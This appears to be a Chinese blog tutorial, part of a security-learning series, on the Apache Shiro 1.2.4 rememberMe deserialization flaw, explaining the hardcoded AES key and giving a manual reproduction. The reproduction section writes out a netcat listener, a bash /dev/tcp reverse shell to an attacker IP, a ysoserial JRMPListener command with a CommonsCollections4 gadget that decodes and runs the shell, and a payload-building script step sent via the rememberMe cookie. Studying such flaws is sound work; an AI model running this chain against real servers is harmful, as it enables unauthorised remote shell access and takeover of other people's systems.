网络安全深入学习第五课——热门框架漏洞(RCE— Apache Shiro 1.2.4反序列化漏洞)

p362732023-09-25 13:46

文章目录

一、序列化和反序列化

  • 什么是序列化?

    序列化就是把对象转换成字节流,便于保存在内存、文件、数据库中,保证对象的完整性和可传递性;

  • 什么是反序列化?

    反序列化即逆过程,由字节流还原成对象。根据字节流中保存的对象状态及描述信息,通过反序列化重建对象。

简单理解,序列化就是把对象转换为电脑能看懂的格式(字节流),反序列化就是把对象转换为人能看得懂的格式(字符、数字)。

在PHP中序列化和反序列化对应的函数分别为serialize()unserialize()

二、反序列化漏洞原理

------ 当程序在进行反序列化时,会自动调用一些函数,以PHP为例有__wakeup()、__destruct()等函数,Java中有readObject()方法等等,但是如果传入函数的参数可以被用户控制的话,用户可以输入一些恶意代码到函数中,从而导致反序列化漏洞。

------ 危害:

  1. 远程代码执行,如:system('whoami')、system('cat/etc/passwd')等
  2. 重放攻击
  3. 注入
  4. 特权提升

三、Apache Shiro 1.2.4反序列化漏洞

1、漏洞描述:

------ Apache Shiro是一个强大且易用的Java安全框架,执行身份验证、授权、密码和会话管理。使用Shiro的易于理解的API,可以快速、轻松地获得任何应用程序,从最小的移动应用程序到最大的网络和企业应用程序。

2、漏洞影响的版本

------ Apache Shiro <=1.2.4

3、Shiro反序列化漏洞原理

------ AES加密的密钥Key被硬编码在代码里,Shiro是开源软件,意味着每个人通过源代码都能拿到AES加密的密钥。因此,攻击者构造一个恶意的对象,并且对其序列化,AES加密,base64编码后,作为cookie的rememberMe字段发送。Shiro将rememberMe进行解密并且反序列化,最终造成反序列化漏洞

------ Shiro提供了记住我(RememberMe)的功能,比如访问淘宝等网站时,关闭了浏览器下次再打开时还是能够记住上次访问过的用户,下次访问时无需再登录即可访问

------ 也就是说它使用了CookieRememberMeManager类对用户的登陆凭证进行处理。我们可以把AES加密的密钥爆破出来。

4、工作原理:

在服务端接收cookie值时,按照如下步骤来解析处理:

  1. 检索RememberMe cookie 的值
  2. Base 64解码
  3. 使用AES解密(加密密钥硬编码)
  4. 进行反序列化操作,生成用户登录信息对象(未作过滤处理)
    在调用反序列化时未进行任何过滤,导致可以触发远程代码执行漏洞。

5、shiro反序列化的特征:

返回包中存在 rememberMe=deleteMe 字段

四、Apache Shiro 1.2.4反序列化漏洞手工复现

1、使用DNSlog严重漏洞是否存在

  • 1)dnslog申请一个临时域名:qsg7i9.dnslog.cn

  • 2)使用shiro.py 脚本,生成检测payload(dns解析)

    例如:python shiro.py "http:// qsg7i9.dnslog.cn "

  • 3)路径下获得了一个payload.cookie

    生成的文件里面有一个序列化的payload

  • 4)把生产的payload复制下来,然后放到Burp上面进行重放

  • 5)返回DNSlog上面去查看

    这样就说明存在反序列化漏洞了。

2、VPS监听端口

nc -lvvp [反弹shell所到的端口]

3、构造反弹shell命令,并且进行base64编码

反弹shell命令:

/bin/bash -i >& /dev/tcp/[反弹shell所到的IP]/ [反弹shell所到的端口] 0>&1

  • 编码前:

  • 编码后:

4、在VPS开启一个JRMP(端口设置1099)

  • 使用工具:ysoserial-master-SNAPSHOT.jar

java -cp ysoserial-master-SNAPSHOT.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections4 "bash -c {echo,[反弹shell命令经过base64编码后的内容]}|{base64,-d}|{bash,-i}"

5、使用s.py构造payload,构造jrmp请求远程恶意序列化数据

python3 s.py [攻击者IP]:1099

这个工具相当于代替我们把payload进行了AES解密,然后进行了base64编码。

6、前台登录,注意需要勾选Remember Me ,截获数据包,加入payload,将payload发送服务器

五、使用工具检查

下面是工具:shiroexpv3.0

相关推荐
漏洞谷2 天前
白帽子为什么几乎都绕不开 httpx:一款 HTTP 资产探测工具的技术价值
web安全·漏洞挖掘·安全工具
一次旅行13 天前
网络安全总结
安全·web安全
西岸行者13 天前
学习笔记:SKILLS 能帮助更好的vibe coding
笔记·学习
悠哉悠哉愿意13 天前
【单片机学习笔记】串口、超声波、NE555的同时使用
笔记·单片机·学习
别催小唐敲代码13 天前
嵌入式学习路线
学习
一名优秀的码农13 天前
vulhub系列-14-Os-hackNos-1(超详细)
安全·web安全·网络安全·网络攻击模型·安全威胁分析
努力的lpp13 天前
SQLMap CTF 常用命令全集
数据库·web安全·网络安全·sql注入
毛小茛13 天前
计算机系统概论——校验码
学习
babe小鑫13 天前
大专经济信息管理专业学习数据分析的必要性
学习·数据挖掘·数据分析
努力的lpp13 天前
SQL 报错注入
数据库·sql·web安全·网络安全·sql注入
热门推荐
01GitHub 镜像站点02OpenClaw 使用和管理 MCP 完全指南03本地部署 OpenClaw + DeepSeek-R1 完全指南04OpenClaw 连接飞书完整指南:插件安装、配置与踩坑记录05OpenClaw 飞书机器人不回复消息?3 小时踩坑总结06Window 10部署openclaw报错node.exe : npm error code 12807OpenClaw 接入 QQ Bot 完整实践指南08OpenClaw macOS 完整安装与本地模型配置教程(实战版)09npm-error code 128问题解决方法10Vue-skills的中文文档